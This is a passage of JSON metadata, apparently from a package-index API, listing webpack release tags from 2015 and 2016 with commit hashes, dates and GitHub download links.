ttps://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpa